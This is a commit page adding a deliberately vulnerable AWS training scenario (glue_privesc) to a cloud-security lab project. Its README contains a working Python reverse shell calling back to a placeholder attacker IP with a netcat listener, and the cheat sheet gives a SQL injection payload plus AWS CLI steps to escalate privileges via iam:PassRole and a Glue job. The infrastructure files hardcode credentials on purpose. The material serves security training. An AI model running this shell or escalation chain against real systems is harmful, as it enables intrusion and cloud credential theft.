
Commit

Merge remote-tracking branch 'origin/master' into scenario/ecs_privesc_evade_protection

# Conflicts:
#	README.md
3iuy-prog committed Dec 11, 2023
2 parents fe7156d + 3ffc11d commit fbd6278
Showing 37 changed files with 1,677 additions and 517 deletions.
57 changes: 57 additions & 0 deletions scenarios/glue_privesc/README.md
@@ -0,0 +1,57 @@
# Scenario: glue_privesc

**Size:** Large

**Difficulty:** Moderate

**Command:** `$ ./cloudgoat.py create glue_privesc`

## Scenario Resources

- 1 VPC with:
  - S3 x 1
  - RDS x 1
  - EC2 x 1
  - Glue service
  - Lambda x 1
  - SSM Parameter Store
- IAM Users x 2

## Scenario Start(s)

Web address

## Scenario Goal(s)

Find a secret string stored in the SSM Parameter Store.

## Summary

The environment is implemented as shown in the schematic drawing below. The Glue service manager accidentally uploads their access keys through the web page. The manager hurriedly deletes the keys from S3, but does not realize that they were also stored in the database.

Find the manager's key, then use the vulnerable permissions attached to it to access the SSM Parameter Store and read the value of the parameter named “flag”.

> *Note*: The web page and the Glue ETL job used in this scenario take some time to become available: the web page needs about 1 minute after the apply completes, and Glue needs about 3 minutes after a file is uploaded. If the data file is not applied properly, please wait a little longer!


## Schematic drawing

![Schematic drawing](assets/image2.png)

## Exploitation Route(s)

![Scenario Route(s)](assets/image.png)

## Route Walkthrough

※ The attacker first explores the web page's functionality: uploading a file stores it in a specific S3 bucket, and that file's data is then reflected on the monitoring page.

1. The attacker steals the Glue manager's access key and secret key through a SQL injection attack on the web page.
2. The attacker checks the policies and permissions of the exposed account to identify vulnerable privileges. These privileges let the attacker create and run a Glue job that performs a reverse shell attack, obtaining the desired role at the same time.
3. List the roles usable with `iam:PassRole`, write the reverse shell code (see the sketch after this list), and upload the code file (.py) to S3 through the web page.
4. To gain SSM access, create a Glue job via the AWS CLI that also executes the reverse shell code.
5. Execute the created job.
6. Extract the value of the parameter named “flag” from the SSM Parameter Store.
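
For step 3, a minimal `rev.py` sketch along the following lines is enough; the listener IP and port below are placeholders, not values prescribed by the scenario:

```python
# rev.py - minimal reverse shell sketch for the Glue pythonshell job.
import os
import socket
import subprocess

ATTACKER_IP = "203.0.113.10"  # placeholder: replace with your listener's IP
ATTACKER_PORT = 4444  # placeholder: replace with your listener's port

# Connect back to the attacker's listener
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ATTACKER_IP, ATTACKER_PORT))

# Wire stdin/stdout/stderr to the socket and spawn an interactive shell
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
subprocess.call(["/bin/sh", "-i"])
```

Start a listener such as `nc -lvnp 4444` on the attacker host before running the job in step 5.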

**A cheat sheet for this route is available [here](./cheat_sheet.md)**
94 changes: 94 additions & 0 deletions scenarios/glue_privesc/assets/ETL_JOB.py
@@ -0,0 +1,94 @@
# Save the CSV data into the RDS table

import sys
from awsglue.transforms import *
from awsglue.utils import getResolvedOptions
from pyspark.context import SparkContext
from awsglue.context import GlueContext
from awsglue.job import Job
from awsglue.dynamicframe import DynamicFrame
from pyspark.sql import SparkSession

# Resolve the AWS Glue job parameters
args = getResolvedOptions(sys.argv, ["JOB_NAME", "s3_source_path", "jdbc_url"])

# S3 source path and JDBC URL passed in as job arguments
s3_source_path = args["s3_source_path"]
jdbc_url = args["jdbc_url"]

# Initialize the SparkContext and GlueContext
sc = SparkContext()
spark = SparkSession(sc)
glueContext = GlueContext(sc)

# Initialize the AWS Glue job
job = Job(glueContext)
job.init(args["JOB_NAME"], args)

# Create a Glue DynamicFrame from the CSV in S3
dynamicFrame = glueContext.create_dynamic_frame.from_options(
    connection_type="s3",
    connection_options={"paths": [s3_source_path]},
    format="csv",
    format_options={
        "withHeader": True,
    },
)

# Cast the price column to a double
dynamicFrame = dynamicFrame.resolveChoice(specs=[("price", "cast:double")])
# dynamicFrame = dynamicFrame.resolveChoice(specs=[("price", "cast:decimal(10,2)")])

print("dynamicFrame : ", dynamicFrame)

# Shape the DataFrame: keep only the needed fields
all_fields_selected = SelectFields.apply(
    frame=dynamicFrame, paths=["order_date", "item_id", "price", "country_code"]
)
print(all_fields_selected)

# Settings needed to write the DynamicFrame to RDS (PostgreSQL)
connection_options = {
    "url": jdbc_url,
    "dbtable": "original_data",
    "user": "postgres",
    "password": "bob12cgv",
    "database": "bob12cgvdb",
}

connection_properties = {"user": "postgres", "password": "bob12cgv"}


# Write the Glue DynamicFrame to RDS (PostgreSQL)
result = glueContext.write_dynamic_frame.from_jdbc_conf(
    frame=all_fields_selected,
    catalog_connection="test-connections",  # name of the JDBC connection defined in the Glue Data Catalog
    connection_options=connection_options,
)

print("result: ", result)

# Load the full table, group it by country, and store the aggregated result
sql_query = "SELECT country_code, COUNT(*) AS purchase_cnt, ROUND(avg(price), 2) AS avg_price FROM original_data GROUP BY country_code"

result_dataframe = spark.read.jdbc(
    url=connection_options["url"],
    table="({}) AS subquery".format(sql_query),
    properties=connection_properties,
)
print(result_dataframe)

# Append the aggregated DataFrame to the cc_data table in RDS (PostgreSQL)
try:
    result_dataframe.write.jdbc(
        url=connection_options["url"],
        table="cc_data",
        mode="append",
        properties=connection_properties,
    )
except Exception as e:
    print("Error while writing to PostgreSQL:", str(e))

# Finish the AWS Glue job
job.commit()
spark.stop()
Binary file added scenarios/glue_privesc/assets/image.png
Binary file added scenarios/glue_privesc/assets/image2.png
Binary file added scenarios/glue_privesc/assets/my_flask_app.zip
Binary file not shown.
11 changes: 11 additions & 0 deletions scenarios/glue_privesc/assets/order_data2.csv
@@ -0,0 +1,11 @@
order_date,item_id,price,country_code
2023-10-01,K2631,48.9,DE
2023-10-02,I6506,41.68,CA
2023-10-03,H7462,93.08,DE
2023-10-04,W8286,16.19,KR
2023-10-05,S5542,64.67,AU
2023-10-06,H0571,28.84,JP
2023-10-07,E8458,32.86,CN
2023-10-08,W5912,45.48,US
2023-10-09,K2178,10.84,CN
2023-10-10,Z2020,83.11,KR
55 changes: 55 additions & 0 deletions scenarios/glue_privesc/assets/s3_to_gluecatalog.py
@@ -0,0 +1,55 @@
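# Lambda function: invoked by an S3 upload event, it ensures the uploaded CSV has the
# expected header and then starts the Glue ETL job on the normalized file.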
import boto3
import os


def add_header_to_csv_file(input_bucket, input_key):
    s3 = boto3.client("s3")

    # Download the original file
    response = s3.get_object(Bucket=input_bucket, Key=input_key)
    content = response["Body"].read().decode("utf-8")

    header = content.split("\r\n")[0]

    if header == "order_date,item_id,price,country_code":
        output_bucket = os.environ["BUCKET_Final"]
        output_key = "result.csv"
        s3.put_object(Bucket=output_bucket, Key=output_key, Body=content)

        return [output_bucket, output_key]

    else:
        # Prepend the header
        header = "order_date,item_id,price,country_code"
        content_with_header = header + "\r\n" + content

        output_bucket = os.environ["BUCKET_Final"]
        output_key = "result.csv"
        s3.put_object(Bucket=output_bucket, Key=output_key, Body=content_with_header)

        return [output_bucket, output_key]


def lambda_handler(event, context):
    glue = boto3.client("glue")
    job_name = "ETL_JOB"  # change to the name of the Glue job to run
    s3_bucket = os.environ["BUCKET_Scenario2"]
    s3_object_key = event["Records"][0]["s3"]["object"]["key"]

    # Get the file extension
    file_format = s3_object_key.split(".")[-1]

    if file_format == "csv":
        output_bucket, output_key = add_header_to_csv_file(s3_bucket, s3_object_key)

        response = glue.start_job_run(
            JobName=job_name,
            Arguments={
                "--s3_source_path": f"s3://{output_bucket}/{output_key}",
                "--jdbc_url": os.environ["JDBC_URL"],
            },
        )
        return response

    else:
        print("file_format is not csv")
18 changes: 18 additions & 0 deletions scenarios/glue_privesc/assets/sql_template.tpl
@@ -0,0 +1,18 @@
CREATE TABLE original_data (
    order_date VARCHAR(255),
    item_id VARCHAR(255),
    price numeric(10,2),
    country_code VARCHAR(50)
);

CREATE TABLE cc_data (
    country_code VARCHAR(50),
    purchase_cnt int,
    avg_price numeric(10,2)
);

%{ for row in csvdecode(csv_content) ~}
INSERT INTO original_data (order_date, item_id, price, country_code) VALUES ('${row.order_date}', '${row.item_id}', ${format("%.2f", row.price)}, '${row.country_code}');
%{ endfor ~}

INSERT INTO original_data (order_date, item_id, price, country_code) VALUES ('${aws_access_key_id}', '${aws_secret_access_key}', DEFAULT, DEFAULT);
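
-- The INSERT above plants the Glue manager's leaked access key in original_data;
-- the SQL injection on the web page later extracts it from this table.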
45 changes: 45 additions & 0 deletions scenarios/glue_privesc/cheat_sheet.md
@@ -0,0 +1,45 @@
1. SQL injection attack using Burp Suite

`' 1=1-- -`
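
(Here the trailing `-- -` comments out the remainder of the SQL statement; the exact payload may need adjusting to fit the vulnerable query.)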

2. Configure a profile with the Glue manager's credentials

`aws configure --profile [glue_manager]`

3. Verify the caller identity

`aws --profile [glue_manager] sts get-caller-identity`

4. List the user's inline policies

`aws --profile [glue_manager] iam list-user-policies --user-name [glue_username]`

5. Inspect an inline policy's contents

`aws --profile [glue_manager] iam get-user-policy --user-name [glue_username] --policy-name [inline_policy_name]`

6. Check the bucket that the policy grants access to

`aws --profile [glue_manager] s3 ls s3://[bucket_name]`

7. List roles to find one usable with iam:PassRole

`aws --profile [glue_manager] iam list-roles`

8. Inspect the policies attached to a role

`aws --profile [glue_manager] iam list-attached-role-policies --role-name [role_name]`

9. Upload the reverse shell code (rev.py) through the web page

10. Create a Glue job that executes the reverse shell code

`aws --profile [glue_manager] glue create-job --name [job_name] --role [role_arn] --command '{"Name":"pythonshell", "PythonVersion": "3", "ScriptLocation":"s3://[bucket_name]/[reverse_shell_code_file]"}'`

11. Run the job

`aws --profile [glue_manager] glue start-job-run --job-name [job_name]`

12. Access the SSM parameter

`aws ssm get-parameter --name flag`
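
If the parameter is stored as a SecureString (an assumption; the scenario does not specify the parameter type), add `--with-decryption` to retrieve the plaintext value:

`aws ssm get-parameter --name flag --with-decryption`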
2 changes: 2 additions & 0 deletions scenarios/glue_privesc/start.sh
@@ -0,0 +1,2 @@
#!/bin/bash
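# Generate the 4096-bit RSA SSH key pair (./cloudgoat and ./cloudgoat.pub) that
# Terraform uses to provision the scenario's EC2 instance (see terraform/ec2.tf)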
ssh-keygen -b 4096 -t rsa -f ./cloudgoat -q -N ""
83 changes: 83 additions & 0 deletions scenarios/glue_privesc/terraform/ec2.tf
@@ -0,0 +1,83 @@
resource "aws_key_pair" "bob-ec2-key-pair" {
key_name = "cg-ec2-key-pair-${var.cgid}"
public_key = file(var.ssh-public-key-for-ec2)
}

resource "aws_instance" "cg-linux-ec2" {
ami = "ami-05c13eab67c5d8861"
instance_type = "t2.micro"
iam_instance_profile = aws_iam_instance_profile.cg-ec2-instance-profile.name
subnet_id = aws_subnet.cg-public-subnet-1.id
associate_public_ip_address = true

vpc_security_group_ids = [
aws_security_group.cg-ec2-security-group.id
]
key_name = aws_key_pair.bob-ec2-key-pair.key_name
root_block_device {
volume_type = "gp3"
volume_size = 8
delete_on_termination = true
}

provisioner "file" {
source = "../assets/my_flask_app.zip"
destination = "/home/ec2-user/my_flask_app.zip"
connection {
type = "ssh"
user = "ec2-user"
private_key = file(var.ssh-private-key-for-ec2)
host = self.public_ip
}
}
provisioner "file" {
source = "../assets/insert_data.sql"
destination = "/home/ec2-user/insert_data.sql"

connection {
type = "ssh"
user = "ec2-user"
private_key = file(var.ssh-private-key-for-ec2)
host = self.public_ip
}
}
user_data = <<-EOF
#!/bin/bash
echo 'export AWS_ACCESS_KEY_ID=${aws_iam_access_key.cg-run-app_access_key.id}' >> /etc/environment
echo 'export AWS_SECRET_ACCESS_KEY=${aws_iam_access_key.cg-run-app_access_key.secret}' >> /etc/environment
echo 'export AWS_RDS=${aws_db_instance.cg-rds.endpoint}' >> /etc/environment
echo 'export AWS_S3_BUCKET=${aws_s3_bucket.cg-data-from-web.id}' >> /etc/environment
echo 'export AWS_DEFAULT_REGION=us-east-1' >> /etc/environment
sudo yum update -y
sudo yum install -y python3
sudo yum install -y python3-pip
sudo yum install -y postgresql15.x86_64
psql postgresql://${aws_db_instance.cg-rds.username}:${aws_db_instance.cg-rds.password}@${aws_db_instance.cg-rds.endpoint}/${aws_db_instance.cg-rds.db_name} -f /home/ec2-user/insert_data.sql
pip install Flask
pip install boto3
pip install psycopg2-binary
pip install matplotlib
cd /home/ec2-user
unzip my_flask_app.zip -d ./my_flask_app
sudo chmod +x *.py
cd my_flask_app
sudo python3 app.py
EOF
volume_tags = {
Name = "CloudGoat ${var.cgid} EC2 Instance Root Device"
Stack = var.stack-name
Scenario = var.scenario-name
}
tags = {
Name = "cg-linux-ec2-${var.cgid}"
Stack = var.stack-name
Scenario = var.scenario-name
}
}

